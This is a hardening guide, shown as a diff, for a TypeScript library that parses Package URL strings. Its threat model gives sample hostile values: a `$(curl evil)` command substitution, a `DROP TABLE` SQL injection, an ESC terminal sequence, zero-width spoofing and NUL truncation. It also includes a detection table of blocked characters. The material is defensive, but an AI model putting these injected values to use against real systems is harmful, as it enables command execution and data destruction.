| 1 | +# Hardening |
| 2 | + |
| 3 | +How this library treats PURL strings as hostile input and refuses to |
| 4 | +hand downstream consumers something that can hurt them. Read this |
| 5 | +if you are touching `src/strings.ts`, `src/objects.ts`, `src/error.ts`, |
| 6 | +or reviewing a PR that adds a new ecosystem handler. |
| 7 | + |
| 8 | +## Who this is for |
| 9 | + |
| 10 | +Contributors adding or reviewing code paths that read PURL input |
| 11 | +from the outside (user text, CLI args, API payloads, file contents). |
| 12 | +The rules here keep the library from being a confused deputy for a |
| 13 | +caller with hostile intent. |
| 14 | + |
| 15 | +## The stance |
| 16 | + |
| 17 | +**Valid PURLs never throw. Hostile input never parses.** |
| 18 | + |
| 19 | +That is the whole doctrine. Everything below is mechanics that turn |
| 20 | +it into code. |
| 21 | + |
| 22 | +A well-formed PURL (spec-conformant shape, no dangerous characters) |
| 23 | +builds a frozen `PackageURL` instance the caller can rely on. An |
| 24 | +ill-formed PURL throws a `PurlError`. An input that looks like it |
| 25 | +wants to be interpreted twice — once as a PURL, and again by a |
| 26 | +downstream consumer (shell, SQL, URL, log pipeline) — throws a |
| 27 | +`PurlInjectionError` **before parse**. The caller never sees a |
| 28 | +half-interpreted object. |
| 29 | + |
| 30 | +## The threat model |
| 31 | + |
| 32 | +We assume the attacker controls the PURL string. They may try to: |
| 33 | + |
| 34 | +1. **Inject shell metacharacters** so a downstream caller that |
| 35 | + interpolates the PURL into a command executes something the |
| 36 | + caller didn't intend. Example: |
| 37 | + `pkg:npm/$(curl evil)/x@1`. |
| 38 | +2. **Break out of a quoted context** so the PURL becomes argv |
| 39 | + splitting fodder or SQL quote-escape. Example: |
| 40 | + `pkg:npm/a";DROP TABLE pkgs;--/x@1`. |
| 41 | +3. **Desync terminal / log parsers** with control characters, so a |
| 42 | + log-review tool renders attacker-controlled bytes as if they |
| 43 | + were tool output. Example: `pkg:npm/a\x1b[2Jb/x@1`. |
| 44 | +4. **Smuggle invisible characters** (zero-width spaces, RLO |
| 45 | + overrides, BOM) so the rendered name looks like one package but |
| 46 | + resolves to another. Example: `pkg:npm/re\u200bact@1` (renders as `react`). |
| 47 | +5. **Truncate** with NUL, so a PURL that looks harmless to a JS |
| 48 | + string parser gets half-read by a C library. Example: |
| 49 | + `pkg:npm/safe\x00evil@1`. |
| 50 | +6. **Mutate a PackageURL** after it has been built, so a consumer |
| 51 | + downstream sees a different name than the one that was validated |
| 52 | + upstream. |
| 53 | + |
| 54 | +This doc is how the library refuses all six. |
| 55 | + |
| 56 | +## The first line: injection-character detection |
| 57 | + |
| 58 | +`src/strings.ts` exports `isInjectionCharCode(code: number)`. It |
| 59 | +returns `true` for any character code in one of four classes: |
| 60 | + |
| 61 | +| Class | Codes | Why | |
| 62 | +|---|---|---| |
| 63 | +| **C0 control characters** | `0x00`–`0x1f` | NUL (truncation), TAB / LF / CR (log injection), ESC (terminal escape), everything else in that range | |
| 64 | +| **Shell metacharacters + brackets + quotes** | `0x20` (space), `!`, `"`, `#`, `$`, `%`, `&`, `'`, `(`, `)`, `*`, `;`, `<`, `=`, `>`, `?`, `[`, `\`, `]`, `` ` ``, `{`, `\|`, `}`, `~`, DEL (`0x7f`) | Shell interpretation, SQL quote-escape, URL-fragment injection |
| 65 | +| **C1 control characters** | `0x80`–`0x9f` | Legacy control bytes; some terminals still act on them | |
| 66 | +| **Unicode invisible/directional** | `U+200B`–`U+200F`, `U+202A`–`U+202E`, `U+2060`, `U+FEFF`, `U+FFFC`, `U+FFFD` | Zero-width chars, bidi marks, embeddings, and overrides (display spoofing, as in IDN-homograph attacks), word joiner, BOM, object replacement and replacement characters |
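
As a rough illustration of the table above, the four classes can be checked with plain range and set comparisons. This is a minimal sketch, not the code in `src/strings.ts`: the ranges are copied from the table, and `SHELL_AND_QUOTE_CODES` and `findInjectionCharCode` are hypothetical names introduced only for this example.

```typescript
// Sketch only: mirrors the table above, not the actual src/strings.ts source.
// SHELL_AND_QUOTE_CODES and findInjectionCharCode are hypothetical names.
const SHELL_AND_QUOTE_CODES: ReadonlySet<number> = new Set(
  Array.from(' !"#$%&\'()*;<=>?[\\]`{|}~', ch => ch.charCodeAt(0)),
)

function isInjectionCharCode(code: number): boolean {
  // C0 controls (0x00-0x1f) and DEL (0x7f).
  if (code <= 0x1f || code === 0x7f) return true
  // Space, shell metacharacters, brackets, and quotes.
  if (SHELL_AND_QUOTE_CODES.has(code)) return true
  // C1 controls.
  if (code >= 0x80 && code <= 0x9f) return true
  // Unicode invisible and directional characters.
  return (
    (code >= 0x200b && code <= 0x200f) ||
    (code >= 0x202a && code <= 0x202e) ||
    code === 0x2060 ||
    code === 0xfeff ||
    code === 0xfffc ||
    code === 0xfffd
  )
}

// Returns the first offending char code in `value`, or -1 if none is found.
function findInjectionCharCode(value: string): number {
  for (let i = 0; i < value.length; i += 1) {
    const code = value.charCodeAt(i)
    if (isInjectionCharCode(code)) return code
  }
  return -1
}
```

Scanning by char code rather than by regex keeps the check linear in the input length, which is consistent with the "simple char scans" the document describes.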
| 67 | + |
| 68 | +Any input containing one of these characters in a component where |
| 69 | +we scan for injection throws `PurlInjectionError` before the |
| 70 | +standard parse logic runs. The error names: |
| 71 | + |
| 72 | +- Which **purl type** the component belongs to (`npm`, `maven`, …) |
| 73 | +- Which **component** failed (`name`, `namespace`, …) |
| 74 | +- The **char code** and a human-readable label |
| 75 | + |
| 76 | +```typescript |
| 77 | +class PurlInjectionError extends PurlError { |
| 78 | + readonly charCode: number |
| 79 | + readonly component: string |
| 80 | + readonly purlType: string |
| 81 | +} |
| 82 | +``` |
| 83 | + |
| 84 | +Callers who want to treat injection attempts as auditable events |
| 85 | +(log, alert, rate-limit the source) can `catch` specifically for |
| 86 | +`PurlInjectionError` and route those up while still handling |
| 87 | +`PurlError` as "just a malformed PURL." |
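
One way a caller might separate the two error types is sketched below. The classes are local stand-ins shaped like the declaration above so the snippet runs on its own; `classifyPurlFailure`, its return values, and the stand-in message text are hypothetical and not part of the library.

```typescript
// Stand-ins so the sketch is self-contained; real code would import these
// from the library instead.
class PurlError extends Error {}

class PurlInjectionError extends PurlError {
  readonly charCode: number
  readonly component: string
  readonly purlType: string

  constructor(purlType: string, component: string, charCode: number) {
    // Placeholder message; the library's real wording is not reproduced here.
    super(`injection character in ${purlType} ${component}`)
    this.charCode = charCode
    this.component = component
    this.purlType = purlType
  }
}

type FailureKind = 'injection' | 'malformed'

// Hypothetical helper: runs `parse` and reports how it failed, if it did.
function classifyPurlFailure(parse: () => unknown): FailureKind | undefined {
  try {
    parse()
    return undefined
  } catch (e) {
    // Check the subclass first: every PurlInjectionError is also a PurlError.
    if (e instanceof PurlInjectionError) return 'injection'
    if (e instanceof PurlError) return 'malformed'
    // Anything else is unexpected, so let it propagate.
    throw e
  }
}
```

The `'injection'` branch is where an audit log entry, alert, or rate-limit counter would go; the `'malformed'` branch can stay an ordinary validation failure.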
| 88 | + |
| 89 | +## The narrower scanner for freer contexts |
| 90 | + |
| 91 | +Some PURL components (like version strings or URL-based qualifier |
| 92 | +values) are legitimately allowed to carry characters that are |
| 93 | +dangerous elsewhere — a URL qualifier value may contain `?`, `&`, |
| 94 | +`=`, `:`, `/` as part of a normal URL. For those contexts |
| 95 | +`src/strings.ts` exports a narrower scanner that only blocks the |
| 96 | +characters that actually enable shell execution or code injection: |
| 97 | +the control characters, the shell metacharacters (`|`, `&`, `;`, |
| 98 | +`` ` ``, `$`, `<`, `>`, `(`, `)`, `{`, `}`, `\`), and quotes. |
| 99 | + |
| 100 | +The choice between the broad and narrow scanner is the difference |
| 101 | +between "this component should be a plain identifier" (use the |
| 102 | +broad scanner; anything non-identifier is suspicious) and "this |
| 103 | +component is a URL-shaped value" (use the narrow scanner; pass |
| 104 | +through URL syntax). |
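
The difference between the two scanners is easiest to see on a URL-shaped value. The following is a sketch that assumes the narrow scanner blocks exactly what the list above names: control characters (taken here to mean C0, DEL, and C1), the twelve shell metacharacters, and both quote characters. `isCommandInjectionCharCode` and `hasCommandInjectionChar` are hypothetical names, since the real export is not named in this document.

```typescript
// Hypothetical names; the narrow scanner's real export is not named above.
// Characters: | & ; ` $ < > ( ) { } \ plus double and single quotes.
const COMMAND_CODES: ReadonlySet<number> = new Set(
  Array.from('|&;`$<>(){}\\"\'', ch => ch.charCodeAt(0)),
)

function isCommandInjectionCharCode(code: number): boolean {
  // Control characters: C0, DEL, and C1 (assumed to match the broad scanner).
  if (code <= 0x1f || code === 0x7f || (code >= 0x80 && code <= 0x9f)) {
    return true
  }
  return COMMAND_CODES.has(code)
}

function hasCommandInjectionChar(value: string): boolean {
  for (let i = 0; i < value.length; i += 1) {
    if (isCommandInjectionCharCode(value.charCodeAt(i))) return true
  }
  return false
}

// URL syntax such as ':', '/', '?', and '=' passes the narrow scan.
const urlValueRejected = hasCommandInjectionChar('https://example.com/repo.git?ref=main')
// Command substitution does not.
const substitutionRejected = hasCommandInjectionChar('https://example.com/$(id)')
```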
| 105 | + |
| 106 | +## The second line: immutable instances |
| 107 | + |
| 108 | +`src/objects.ts` exports `recursiveFreeze(value)`. Every |
| 109 | +`PackageURL` instance runs through it at construction time: |
| 110 | + |
| 111 | +- Top-level instance is `Object.freeze`-d. |
| 112 | +- Qualifiers object is frozen. |
| 113 | +- Any nested objects or arrays reachable from the instance are |
| 114 | + frozen. |
| 115 | + |
| 116 | +That means a `PackageURL` you receive from a library call cannot be |
| 117 | +mutated by a later code path: |
| 118 | + |
| 119 | +```typescript |
| 120 | +const purl = new PackageURL('npm', undefined, 'safe-pkg', '1.0.0') |
| 121 | +purl.name = 'evil-pkg' // silently ignored (strict mode: throws) |
| 122 | +purl.qualifiers.key = 'hax' // silently ignored (strict mode: throws) |
| 123 | +``` |
| 124 | + |
| 125 | +This matters when a validated PURL is passed through three or more hops: a |
| 126 | +middle hop can't secretly modify the object and hand it to the next |
| 127 | +hop. Validation up front + freeze means "validated" still means |
| 128 | +something at the endpoint. |
| 129 | + |
| 130 | +The freeze walk is **breadth-first** with a `WeakSet` for cycle |
| 131 | +detection and a hard ceiling at one million nodes |
| 132 | +(`LOOP_SENTINEL`). An adversary-constructed cyclic object cannot |
| 133 | +loop the walker forever; a million-node object graph throws |
| 134 | +`Error("Object graph too large…")` rather than OOM-ing the |
| 135 | +process. |
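
The walk described above might look roughly like this. It is a sketch under stated assumptions, not the code in `src/objects.ts`: the `maxNodes` parameter is hypothetical (added so the cap can be exercised with a small number), and the error text is shortened because the full message is elided above.

```typescript
// Sketch only. The cap value follows the "one million nodes" figure above.
const LOOP_SENTINEL = 1_000_000

// `maxNodes` is a hypothetical parameter, present only to make the cap testable.
function recursiveFreeze<T>(value: T, maxNodes: number = LOOP_SENTINEL): T {
  if (value === null || typeof value !== 'object') return value
  const seen = new WeakSet<object>()
  const queue: object[] = [value]
  seen.add(value)
  // Breadth-first: advance a head index instead of calling shift().
  for (let head = 0; head < queue.length; head += 1) {
    const node = queue[head] as object
    Object.freeze(node)
    for (const key of Reflect.ownKeys(node)) {
      // Read through the descriptor so accessor properties are never invoked.
      const child: unknown = Object.getOwnPropertyDescriptor(node, key)?.value
      if (child !== null && typeof child === 'object' && !seen.has(child)) {
        // Enforce the ceiling before the queue can grow past it.
        if (queue.length >= maxNodes) {
          throw new Error('Object graph too large')
        }
        seen.add(child)
        queue.push(child)
      }
    }
  }
  return value
}
```

The `WeakSet` is what stops a cycle from being re-queued; the node cap is a separate guard that bounds memory for graphs that are merely huge rather than cyclic.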
| 136 | + |
| 137 | +## The third line: error messages that don't leak |
| 138 | + |
| 139 | +`src/error.ts`'s `formatPurlErrorMessage` normalizes every |
| 140 | +user-visible error message: |
| 141 | + |
| 142 | +- Lowercase the first letter (`Invalid → invalid`) |
| 143 | +- Strip a trailing period |
| 144 | +- Prefix with `Invalid purl:` |
| 145 | + |
| 146 | +The normalization matters because error strings land in logs, |
| 147 | +support tickets, and sometimes in HTTP responses. A consistent |
| 148 | +shape: |
| 149 | + |
| 150 | +- Is grep-able (every one starts with `Invalid purl:`). |
| 151 | +- Never renders attacker-controlled bytes verbatim when injection is |
| 152 | + detected — the `PurlInjectionError` message says *the char label* |
| 153 | + (e.g. "SPACE", "NUL", "BACKTICK"), not the raw character, so a |
| 154 | + terminal displaying the log never interprets an ESC sequence the |
| 155 | + attacker embedded. |
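
The three normalization steps and the label substitution can be sketched as follows. The signature of `formatPurlErrorMessage` is an assumption (this document only lists what it does), and `CHAR_LABELS` and `charLabel` are hypothetical stand-ins for however the library maps a char code to a label.

```typescript
// Sketch of the three steps listed above; the real function is in
// src/error.ts and its exact signature is assumed here.
function formatPurlErrorMessage(message: string): string {
  let out = message
  // Lowercase the first letter.
  if (out.length > 0) out = out.charAt(0).toLowerCase() + out.slice(1)
  // Strip a trailing period.
  if (out.endsWith('.')) out = out.slice(0, -1)
  return `Invalid purl: ${out}`
}

// Hypothetical label lookup: a few named characters, hex for everything else.
const CHAR_LABELS: ReadonlyMap<number, string> = new Map([
  [0x00, 'NUL'],
  [0x1b, 'ESC'],
  [0x20, 'SPACE'],
  [0x60, 'BACKTICK'],
])

function charLabel(code: number): string {
  return CHAR_LABELS.get(code) ?? `0x${code.toString(16).padStart(2, '0')}`
}

// The message carries the label, never the raw byte.
const escMessage = formatPurlErrorMessage(`Name contains ${charLabel(0x1b)}.`)
```

Because the label is plain ASCII text, the message stays safe to print even when the offending character was a terminal escape.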
| 156 | + |
| 157 | +## When to call what |
| 158 | + |
| 159 | +| Situation | Use | |
| 160 | +|---|---| |
| 161 | +| Parsing a full PURL string from untrusted input | `PackageURL.fromString(str)` (throws `PurlInjectionError` or `PurlError`) |
| 162 | +| Validating a user-submitted PURL in a form | `PackageURL.fromStringResult(str)` — returns `Result`, collect failures | |
| 163 | +| Building a PURL from already-trusted pieces (internal codepaths) | `new PackageURL(type, ns, name, version, qualifiers, subpath)` — still runs validation but you know the inputs are clean | |
| 164 | +| Comparing two PURLs | `purl.equals(other)` / `purl.matches(pattern)` — both ReDoS-safe | |
| 165 | + |
| 166 | +For converter utilities (URL → PURL, PURL → URL) see |
| 167 | +`docs/converters.md`; for the builder API see `docs/builders.md`. |
| 168 | + |
| 169 | +## Red flags when reviewing a PR |
| 170 | + |
| 171 | +If a PR touches PURL-component handling, pause if you see any of: |
| 172 | + |
| 173 | +1. **Bypassing the injection scan.** A rule like "skip |
| 174 | + `isInjectionCharCode` for this type because the user won't ever |
| 175 | + put weird characters there" is exactly the kind of assumption |
| 176 | + that gets a library blamed for the next CVE. If the scan is |
| 177 | + expensive in a hot path, optimize the scan — never skip it. |
| 178 | +2. **Unfreezing.** `Object.freeze` takes a single argument and cannot |
| 179 | + be undone, so the risk is code that skips `recursiveFreeze` or clones |
| 180 | + into a mutable shape (unless a new instance is being built from |
| 181 | + scratch). If you see code that hands back a mutable copy, call it out. |
| 182 | +3. **Raw char interpolation in error messages.** Every |
| 183 | + `PurlInjectionError` is built from `charLabel`, not the raw |
| 184 | + character. If a new error message string-interpolates a |
| 185 | + suspect char directly, that message will render the char |
| 186 | + verbatim in someone's terminal later. |
| 187 | +4. **Removing the `LOOP_SENTINEL` cap** on `recursiveFreeze` or |
| 188 | + bumping it to `Infinity`. The ceiling is the last line between a |
| 189 | + hostile oversized object graph and process-wide OOM. |
| 190 | +5. **Catching and swallowing `PurlInjectionError` silently.** |
| 191 | + Injection attempts are a signal, not noise. They deserve to |
| 192 | + propagate to the caller who can choose to log/alert/block. |
| 193 | +6. **New ecosystem handler that doesn't use `PurlComponent`'s |
| 194 | + shared normalize/validate.** Every ecosystem inherits the |
| 195 | + injection scan via the shared components. An ad-hoc parser |
| 196 | + inside `src/purl-types/<x>.ts` bypasses that by default. |
| 197 | + |
| 198 | +## What this library does **not** defend against |
| 199 | + |
| 200 | +Be honest about scope: |
| 201 | + |
| 202 | +- **Resource exhaustion.** A very long valid PURL will still be |
| 203 | + processed. We do not impose a max string length. Callers who |
| 204 | + accept PURLs from the wire should rate-limit and size-limit at |
| 205 | + the boundary. |
| 206 | +- **Regex catastrophic backtracking in patterns you pass to us.** |
| 207 | + The library's own internal regexes are ReDoS-free (simple char |
| 208 | + scans), but if you pass a user-controlled pattern to |
| 209 | + `purl.matches(userPattern)`, validate that pattern yourself. |
| 210 | +- **Typosquatting / ecosystem-level package confusion.** That is a |
| 211 | + policy problem at the package-registry layer (Socket's main |
| 212 | + product, in fact) — not a string-level check this library can |
| 213 | + make. |
| 214 | +- **Crafted URLs in URL-converter inputs.** `urlConverter.fromUrl` |
| 215 | + trusts its input is a real URL string. Pass untrusted URLs |
| 216 | + through `new URL()` first. |
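
A boundary check along the lines of the last bullet might look like this. It is a sketch for caller code, not something the library provides: `parseUntrustedUrl` and `MAX_URL_LENGTH` are hypothetical, the length limit is arbitrary, and the scheme allow-list is an assumption about what a caller would want.

```typescript
// Hypothetical boundary check; the limit is arbitrary and should suit the caller.
const MAX_URL_LENGTH = 2048

function parseUntrustedUrl(input: string): URL | undefined {
  // Size-limit before doing any parsing work.
  if (input.length > MAX_URL_LENGTH) return undefined
  let url: URL
  try {
    // The WHATWG URL constructor throws a TypeError on unparseable input.
    url = new URL(input)
  } catch {
    return undefined
  }
  // Accept only the schemes the caller actually expects.
  return url.protocol === 'https:' || url.protocol === 'http:' ? url : undefined
}
```

A caller could then hand the normalized `url.href` to the converter and treat `undefined` as a rejected request.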
| 217 | + |
| 218 | +If the caller's use case hits one of these, document it at the |
| 219 | +boundary; don't try to push it into the library. |
| 220 | + |
| 221 | +## Checklist for adding a new ecosystem handler |
| 222 | + |
| 223 | +- [ ] Handler file at `src/purl-types/<name>.ts`. |
| 224 | +- [ ] `normalize`, `validate` rules use the shared `PurlComponent` |
| 225 | + helpers — no ad-hoc parsing. |
| 226 | +- [ ] Any custom check calls `isInjectionCharCode` (or the narrower |
| 227 | + command-execution scanner) before other logic. |
| 228 | +- [ ] Tests include at least one case per injection class (shell |
| 229 | + char, control char, unicode invisible) — expect |
| 230 | + `PurlInjectionError`. |
| 231 | +- [ ] No mutation of the PURL instance after construction. |
| 232 | +- [ ] No catch-and-swallow of `PurlInjectionError`. |
| 233 | +- [ ] Error messages use `charLabel`, never raw chars. |
| 234 | +- [ ] Registered in `src/purl-type.ts`'s `knownTypes` map. |
| 235 | +- [ ] `pnpm test` green, `pnpm cover` still at 100%. |
| 236 | + |
| 237 | +## Further reading |
| 238 | + |
| 239 | +- [`docs/architecture.md`](./architecture.md) — where these modules |
| 240 | + fit in the larger design. |
| 241 | +- [`docs/api.md`](./api.md) — the full public API reference. |
| 242 | +- [`docs/vers.md`](./vers.md) — version-range specifiers; also |
| 243 | + hostile-input territory. |
| 244 | +- [`src/strings.ts`](../src/strings.ts) — `isInjectionCharCode` + |
| 245 | + narrower scanners. |
| 246 | +- [`src/objects.ts`](../src/objects.ts) — `recursiveFreeze` + |
| 247 | + `LOOP_SENTINEL`. |
| 248 | +- [`src/error.ts`](../src/error.ts) — `PurlError` + |
| 249 | + `PurlInjectionError` + `formatPurlErrorMessage`. |
| 250 | +- [package-url/purl-spec](https://github.com/package-url/purl-spec) — |
| 251 | + the upstream spec this library implements. |